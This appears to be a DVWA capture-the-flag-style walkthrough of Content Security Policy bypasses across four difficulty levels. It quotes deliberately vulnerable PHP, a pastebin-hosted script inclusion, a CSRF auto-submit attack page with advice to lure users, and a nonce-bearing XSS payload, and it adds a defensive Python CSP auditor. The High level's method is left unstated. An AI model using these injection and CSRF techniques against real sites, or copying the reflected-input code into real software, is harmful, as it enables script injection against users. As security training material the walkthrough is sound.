Content Security Policy (CSP) Bypass
Low CSP
Core code
<?php
// allows js from self, pastebin.com, jquery and google analytics.
$headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com example.com code.jquery.com https://ssl.google-analytics.com ;";
header($headerCSP);
# https://pastebin.com/raw/R570EE00
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
    <script src='" . $_POST['include'] . "'></script>
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>You can include scripts from external sources, examine the Content Security Policy and enter a URL to include here:</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';
?>
Reading the code, the whitelisted script sources are 'self', https://pastebin.com, example.com, code.jquery.com and https://ssl.google-analytics.com.
The DVWA author has even left the solution in the comment (the pastebin raw URL).
https://pastebin.com is a quick text-sharing site, so we can put the attack code in a paste there.
After the paste is created, click "raw" to get the attack page.
Enter that URL in the text box and click Include to pull the text in; the alert box pops up.
Viewing the page source shows that the URL has indeed been included.
We can combine this with CSRF to make the attack more automatic.
Create an attack page on a local server, csp_csrf.html:
<form id="csp" name="csp" method="POST" action="http://192.168.1.200/DVWA-master/vulnerabilities/csp/">
    <input size="50" type="text" name="include" value="" id="include">
    <script>
        var cspb = document.getElementById("csp");
        cspb[0].value = "https://pastebin.com/raw/rcBeKDgL";
        cspb.submit();
    </script>
</form>
Use social engineering or similar means to lure a user into opening the link to this page, and the attack succeeds.
Medium CSP
Core code
<?php
$headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';";
header($headerCSP);
// Disable XSS protections so that inline alert boxes will work
header ("X-XSS-Protection: 0");
# <script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
    " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';
?>
Other writeups point out that script-src here also carries two special values:
unsafe-inline: allows inline <script> tags and event-handler attributes in the page to execute
nonce: each HTTP response hands out an authorization token, and an inline script must carry this token to be executed
Here both unsafe-inline and nonce are used, so an inline script in the page must carry this token before it will run.
Viewing the page source confirms the payload:
<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1)</script>
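To make the whitelist analysis above and the unsafe-inline / nonce semantics concrete, here is an added example (not part of the original post or of DVWA) in Python: a minimal script-src evaluator that answers "would this script URL load under this policy?" for the three headers quoted on this page, plus a small audit that flags the two defensive problems seen here, a public paste host on the allowlist and an 'unsafe-inline' that browsers ignore once a nonce is present. The page origin http://192.168.1.200 is taken from the CSRF page above; the PUBLIC_CONTENT_HOSTS list is a constructed assumption.

```python
from urllib.parse import urlparse

# script-src policies copied from the three DVWA levels discussed on this page
DVWA_POLICIES = {
    "low": "script-src 'self' https://pastebin.com example.com code.jquery.com "
           "https://ssl.google-analytics.com ;",
    "medium": "script-src 'self' 'unsafe-inline' "
              "'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';",
    "high": "script-src 'self';",
}
# Constructed list: hosts anyone can publish to. Allowlisting one of them
# is equivalent to allowing any script at all.
PUBLIC_CONTENT_HOSTS = {"pastebin.com"}


def parse_script_src(policy):
    """Return the source expressions of the script-src directive ([] if absent)."""
    for directive in policy.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "script-src":
            return parts[1:]
    return []


def script_allowed(policy, script_url, page_origin="http://192.168.1.200"):
    """Simplified CSP host-source matching: would <script src=script_url> load?
    Handles 'self' and scheme/host sources; wildcards and ports are not modelled."""
    u, p = urlparse(script_url), urlparse(page_origin)
    for src in parse_script_src(policy):
        if src == "'self'":
            if (u.scheme, u.netloc) == (p.scheme, p.netloc):
                return True
        elif not src.startswith("'"):  # keywords, nonces and hashes never match a URL
            s = urlparse(src if "://" in src else "//" + src)
            # a scheme-less host source matches the page's scheme or https
            scheme_ok = u.scheme == s.scheme if s.scheme else u.scheme in (p.scheme, "https")
            if scheme_ok and u.hostname == s.hostname:
                return True
    return False


def audit_script_src(policy):
    """Findings a reviewer would raise about the directive, as short strings."""
    srcs = parse_script_src(policy)
    findings = []
    has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha")) for s in srcs)
    if "'unsafe-inline'" in srcs:  # CSP2+ browsers ignore it once a nonce/hash is present
        findings.append("unsafe-inline ignored (nonce/hash present)" if has_nonce_or_hash
                        else "unsafe-inline: injected inline scripts execute")
    for s in srcs:
        if not s.startswith("'") and urlparse("//" + s.split("://")[-1]).hostname in PUBLIC_CONTENT_HOSTS:
            findings.append(f"{s}: public paste host, anyone can serve scripts from it")
    return findings
```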
High CSP
Core code
<?php
$headerCSP = "Content-Security-Policy: script-src 'self';";
header($headerCSP);
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
    " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>The page makes a call to ' . DVWA_WEB_PAGE_TO_ROOT . '/vulnerabilities/csp/source/jsonp.php to load some code. Modify that page to run your own code.</p>
    <p>1+2+3+4+5=<span id="answer"></span></p>
    <input type="button" id="solve" value="Solve the sum" />
</form>
<script src="source/high.js"></script>
';
?>
The CSP rule at this level is nastier: only 'self' is allowed, i.e. scripts served from the page's own origin.
Let's follow the reference and look at the source of that page (source/high.js):
// creates a script tag pointing at the JSONP endpoint
function clickButton() {
    var s = document.createElement("script");
    s.src = "source/jsonp.php?callback=solveSum";
    document.body.appendChild(s);
}
function solveSum(obj) {
    if ("answer" in obj) {
        document.getElementById("answer").innerHTML = obj['answer'];
    }
}
// when the solve button is clicked, call clickButton()
var solve_button = document.getElementById ("solve");
if (solve_button) {
    solve_button.addEventListener("click", function() {
        clickButton();
    });
}
Reading the code, the attack can be carried out by submitting the parameter in a POST request; the specific method is as follows:
Impossible CSP
Core code
<?php
$headerCSP = "Content-Security-Policy: script-src 'self';";
header($headerCSP);
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
    " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Unlike the high level, this does a JSONP call but does not use a callback, instead it hardcodes the function to call.</p><p>The CSP settings only allow external JavaScript on the local server and no inline code.</p>
    <p>1+2+3+4+5=<span id="answer"></span></p>
    <input type="button" id="solve" value="Solve the sum" />
</form>
<script src="source/impossible.js"></script>
';
?>
source/impossible.js:
// the callback name is no longer taken from a request parameter
function clickButton() {
    var s = document.createElement("script");
    s.src = "source/jsonp_impossible.php";
    document.body.appendChild(s);
}
function solveSum(obj) {
    if ("answer" in obj) {
        document.getElementById("answer").innerHTML = obj['answer'];
    }
}
var solve_button = document.getElementById ("solve");
if (solve_button) {
    solve_button.addEventListener("click", function() {
        clickButton();
    });
}
The defense here is solid.